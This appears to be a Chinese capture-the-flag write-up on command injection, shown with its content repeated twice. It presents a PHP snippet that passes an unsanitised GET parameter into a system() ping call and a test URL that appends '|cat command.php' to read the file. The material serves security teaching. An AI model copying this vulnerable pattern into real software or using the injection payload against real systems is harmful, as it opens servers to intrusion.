【CTF WEB】命令执行
命令执行
找到题目中的KEY
KEY为八位随机字符数字,例如key:1234qwer。提交1234qwer 即可。
漏洞代码
<?php
system("ping -c 2 ".$_GET['ip']);
?>
测试方法
http://localhost/command.php?ip=127.0.0.1|cat command.php
找到题目中的KEY
KEY为八位随机字符数字,例如key:1234qwer。提交1234qwer 即可。
漏洞代码
<?php
system("ping -c 2 ".$_GET['ip']);
?>
http://localhost/command.php?ip=127.0.0.1|cat command.php
